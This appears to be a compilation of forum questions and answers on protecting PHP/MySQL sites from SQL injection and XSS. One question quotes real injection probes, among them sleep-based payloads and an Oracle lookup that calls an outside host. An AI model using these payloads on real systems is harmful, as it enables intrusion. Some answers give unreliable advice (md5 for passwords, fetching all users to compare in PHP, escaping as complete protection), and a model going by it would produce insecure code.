This question already has answers here:
How can I prevent SQL injection in PHP?
(27 answers)
Closed 1 year ago.
I'm a newbie in PHP development. I created a site using PHP, HTML & Css which has a contact us page. Since last couple of days someone from a particular country (I don't want to mention the country name) is creating support message and entering some unusual or suspicious messages.
The contact from has four fields such as Full Name, E-mail, Subject & Message.
Someone is sending messages like
1st:
written as "Subject" & (select(0)from(select(sleep(6)))v)/*'+
(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2nd:
-1' OR 2+582-582-1=0+0+0+1 or '0gX9xp3t'='
3rd:
1iY5zL4R'));select pg_sleep(3); --
4th:
1||UTL_INADDR.get_host_address('dns.'||'sqli.032682.7775.77.a4f00.1.bxss'||'.me')
And there are many, please anyone who is familiar with PHP or others tell me what is this going on. Also please share some security precautions which I should take to prevent any threats or hacking.
I have built my site using MYSQLi to prevent/minimize SQL injection threats.
Few methods you can take to make your form safe are:-
Use htmlspecialchars() to prevent XSS attacks.
Encrypt passwords and other personal information via md5() or other methods.
Use POST method instead of GET for transferring confidential information.
Do not transfer confidential data through URL.
Use certain tools to prevent spambots attack.
If possible, add recaptcha.
For more tips, kindly check out https://www.thoughtco.com/solutions-to-protect-web-forms-from-spam-3467469.
PS: I am also new to PHP, just sharing my thoughts! Trust it is helpful.
Related
This question already has answers here:
How can I prevent SQL injection in PHP?
(27 answers)
Closed 9 years ago.
I want to / am busy with completely re-writing my whole site. At this point I am working on what I call "members- and safety engine". I have been reading a lot about security and SQL injection, and it is pretty complicated.
ps. My site is more a hobby than a professional money making website with about 250+ members.
For username AND password I only allow the characters a-z, A-Z and 0-9. I check this in the if(isset(post))-function with:
if(ctype_alnum(mysql_real_escape_string(stripslashes($string))) == false) {
header to error-page; exit;}
else {continu with script}
This check is done for both the password and the username.
When somebody tries to login with a unknown username or a known username with a wrong password the action is logged (inserted) in a special table, including IP address. After 10 attempts to login with an unknown username, or 6 attempts with a wrong password the IP address is blocked from the members area and on all the non-member pages forms and submit of the forms are not shown and they are not useable because of this ip-block. I even have this ip-check as a line when the form is submitted... if the ip is in the table, header(to error page); exit;.
My questions:
Do I have to make a security check when I place the
IP address in a string? $xip = $_SERVER['REMOTE_ADDR']; this $xip is
inserted in the table when trying to log in with a unknown user or
with wrong password.
Is this a (pretty) safe environment against hacking and SQL injection?
If not? I really appreciate help and suggestions (writing the complete solution here is very much appreciated, but I learn a lot
more when you send me on the right path to the solution)
Do I also have to run the "ctype_alnum" check when I retrieve this info from the $_cookie or the $_session?
ps. I am dutch, so almost all of my table names, column names, form input-field-names etc etc etc have a dutch word for it. I am still working on it, but when the site is finished you will not find the word "password", "pass", "user", "userid", or anything like that on my site.
Using prepared statements with MySQLi or PDO is a must as a first step to preventing SQL injection, and the mysql_* commands are deprecated anyway.
But, the best place to answer your questions for best practices at preventing SQL Injection would be OWASP: They have many great resources for both general methodologies and review of code, as well as language-specific guidelines and libraries.
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
No you don't have to, this variable is safe. Have a look at : Is it safe to trust serverremot addr
It depends, you will have to post the entire authentication code
Usually a good practice is to select every users from the DB, then iterate over them and compare username/password in order to find a match. That way you don't need to place user input in the SQL statement.
It depends what you do with the content of these
This question already has answers here:
How can I sanitize user input with PHP?
(16 answers)
Closed 2 years ago.
I own an online game where you have a status box. Which you can update it on how you're feeling. The problem I have had was that users were putting java script tags into messages and into status. So when another user came to their page, a pop up box would pop up saying haha or whatever they wanted.
I then stopped that by using
$status = mysql_real_escape_string($_POST['status']);
$foo = preg_replace('/[^a-z]/i', null, $status );
That has now stopped any JavaScript being ran but now when someone sends someone a message, it takes the spaces out so for the message "how are you " It will show "howareyou". Of course this is safe but users can't read messeges. Is there any other way from stopping script tags being inserted into the virable but still allow spaces?
I'm also real scared of someone hacking me with XSS. Because before, I was told a user could enter something in a message then when the other user opens it, it will send them there password.....
First of all using mysql_real_escape_string() on all external input prevents all SQL injections - no preg_replace needed at all! But that's only for preventing SQL injection.
In order to prevent scripting / HTML injection on your website, you should always use htmlspecialchars() to escape all text that comes from user input before you present it to a visitor of your site. (e.g. immediately after SELECT from database)
Please take this serious: If you find the time, go and google for SQL injection! It is not complicated and you'll understand it easily. If you create websites - no matter for whom - and store user input in a database, you will observe that someone tries to do SQL injection. It is easy to do, and there is automated software out in the web that can easily try all sorts of SQL injection on hundreds or thousands of websites automatically! And for a client it definitely is not acceptable if the developer doesn't prevent SQL injection at all, so take your time for this issue.
The same goes for script injection! As with SQL injection, preventing this is really very easy. All you have to do is convert all text that comes from user input into HTML, so that when some evil guy enters <script>...</script>, your visitors will simply see exactly this, because for example the < gets converted into < and thus prevents the script from being interpreted by the browser as javascript.
$foo = htmlspecialchars($status);
This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Best way to stop SQL Injection in PHP
I'm currently designing and building my own content management system and my main worry is someone using an sql injection on my forms. I have a decent amount of security to get into my CMS but on the front end of the site I'll have a subscriber form and contact for which will link to my mySql database.
What tend to be the conventional PHP methods for preventing sql injection on forms?
any help would be great, thanks.
There's a function mysql_real_escape_string() which is generally seen as a basic requirement for preventing this kind of attack.
Don't forget to also set a character encoding. I'd suggest UTF-8. And make sure your HTML uses the same encoding as your database/tables.
Probably one of the best solutions is to filter all incoming data with function mysql_real_escape_string
To protected yourself against SQL Injection you need to sanitize input and use parameter queries.
I'm not sure about PHP, but I think you have something like prepared statements. You should search and read a little about it.
Also, that is not the only problem you should care about, please (!!!) take a look at https://www.owasp.org/index.php/Main_Page
This question already has answers here:
Closed 12 years ago.
Possible Duplicate:
Where can I find a web-project “security checklist?”
i was just wondering when creating an php/mysql app, whats the main security issues a developer is got to consider, i know this could be a major broad topic, but i just wanted an overview of where to look, and while im wrting and devloping the app, what i need to be aware of thans!! :))
VERY broad topic indeed. Just to name the basics, which ideally everyone should be aware of:
Don't trust any user input. But this I mean sanitize all user input to prevent SQL injection
Escape all data being outputted on the page appropriately to prevent XSS vulnerabilities and cookie data.
Do not include files based on user input
Log all your errors appropriately. Ideally, in an error log.
Store passwords via a one way hash which incorporate a secure salt.
And read through Seven habits for writing secure PHP applications.
You can take a look at the OWASP Top 10, which is a top 10 of the most common flaw in web application. It converts the most common issue that you will come through.
Web version
PDF version
There's some very useful references to security checklists that you should consider in this previous response to the same question
This question already has answers here:
Closed 12 years ago.
Possible Duplicate:
What security issues should I look out for in PHP
what are the SECURITY THREATS while using PHP connected with MySQL
what STEPS should be followed\insured to maximize security
You should at least properly quote your data to avoid injection. Google PHP and Mysql Injection for more information on this. Also see: http://nl.php.net/manual/en/function.mysql-real-escape-string.php
especially note example2 which explaines injection.
As said before, SQL injection is the most common attack. But also have to be sure you don't use a superuser or any other database role that has too much permissions, to connect with your database. Make sure you create a role that has the bare minimum permissions to function, and use this role in your PHP script.
You could also use stored procedures and/or views to revoke direct access to tables and data.
And whatever you do, make sure you use strong passwords and only store hashes of these passwords.
Do not trust input, all input is evil.
Number one issue is usually user input, especially when using a database. Make sure the user can never input anything that can harm your site - whether it's executable PHP (say you're using eval for some reason), or SQL injection.